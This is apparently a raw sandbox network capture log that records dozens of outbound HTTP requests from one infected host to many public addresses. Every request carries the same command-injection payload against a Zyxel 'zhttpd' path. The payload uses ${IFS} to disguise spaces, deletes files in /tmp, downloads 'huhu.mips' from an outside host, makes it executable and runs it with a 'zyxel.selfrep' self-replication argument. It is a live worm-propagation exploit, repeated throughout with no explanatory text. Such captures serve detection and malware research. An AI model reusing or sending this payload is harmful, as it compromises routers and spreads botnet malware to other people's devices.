                                      Jan 19, 2024 17:29:20.526451111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1235192.168.2.1440698213.14.193.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526487112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1236192.168.2.143763864.32.59.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526523113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1237192.168.2.1443236186.255.38.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526559114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1238192.168.2.145638220.20.52.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526618958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1239192.168.2.1452410135.46.118.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526640892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1240192.168.2.14329682.250.21.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526691914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1241192.168.2.1457198223.195.67.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526724100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1242192.168.2.144324665.236.181.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526782990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1243192.168.2.1451952193.204.148.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526813030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1244192.168.2.1458220186.101.202.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526855946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1245192.168.2.1441816175.150.147.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526911020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1246192.168.2.1457560131.53.187.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526946068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1247192.168.2.1450988203.88.163.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.526983976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1248192.168.2.1458616194.216.45.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527023077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1249192.168.2.145685438.138.33.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527045012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1250192.168.2.1436722126.45.167.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527085066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1251192.168.2.145519879.178.49.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527113914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1252192.168.2.144415076.155.172.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527133942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1253192.168.2.1450468167.197.137.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527172089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1254192.168.2.14544209.213.89.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527200937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1255192.168.2.1449980173.54.100.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527225018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1256192.168.2.1437910133.232.254.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527308941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1257192.168.2.1438330223.228.64.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527339935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1258192.168.2.1458460184.162.159.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527365923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1259192.168.2.1454644146.192.225.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527410030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1260192.168.2.145950452.174.219.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527450085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1261192.168.2.144514681.168.172.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527482986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1262192.168.2.1432926204.223.217.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527535915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1263192.168.2.14342701.129.245.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527558088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1264192.168.2.144771289.91.249.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527580023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1265192.168.2.14537042.159.106.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527631044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1266192.168.2.1447882219.198.62.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527645111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1267192.168.2.144675232.182.216.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527694941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1268192.168.2.144512827.187.98.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527740002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1269192.168.2.1446878170.16.124.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527782917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1270192.168.2.1438244213.219.52.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527827978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1271192.168.2.145833057.72.210.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527857065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1272192.168.2.144632619.177.118.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527892113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1273192.168.2.14545845.80.228.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527951956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1274192.168.2.1434794118.166.165.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.527987957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1275192.168.2.1433014194.168.44.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528033972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1276192.168.2.1445108202.178.58.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528070927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1277192.168.2.144330290.239.243.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528098106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1278192.168.2.1433962212.164.16.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528129101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1279192.168.2.1450598200.194.85.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528184891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1280192.168.2.145515036.84.63.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528202057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1281192.168.2.1433882113.193.65.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528263092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1282192.168.2.1446470205.40.238.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528312922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1283192.168.2.1452960193.15.78.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528346062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1284192.168.2.1433912212.113.250.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528393030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1285192.168.2.145151470.2.11.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528445005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1286192.168.2.145183447.56.40.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528479099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1287192.168.2.145101090.110.184.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528526068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1288192.168.2.1459496103.141.167.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528575897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1289192.168.2.143361466.1.24.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528625011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1290192.168.2.1455466128.183.143.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528664112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1291192.168.2.1439072193.227.136.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528677940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1292192.168.2.145223683.3.23.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528745890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1293192.168.2.145282439.223.121.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528773069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1294192.168.2.1446224213.182.40.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528820992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1295192.168.2.144742067.250.99.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528856993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1296192.168.2.1439640191.9.80.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528892994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1297192.168.2.145215445.199.63.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.528934002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1298192.168.2.1456366108.21.128.5443
                                      TimestampBytes transferredDirectionData
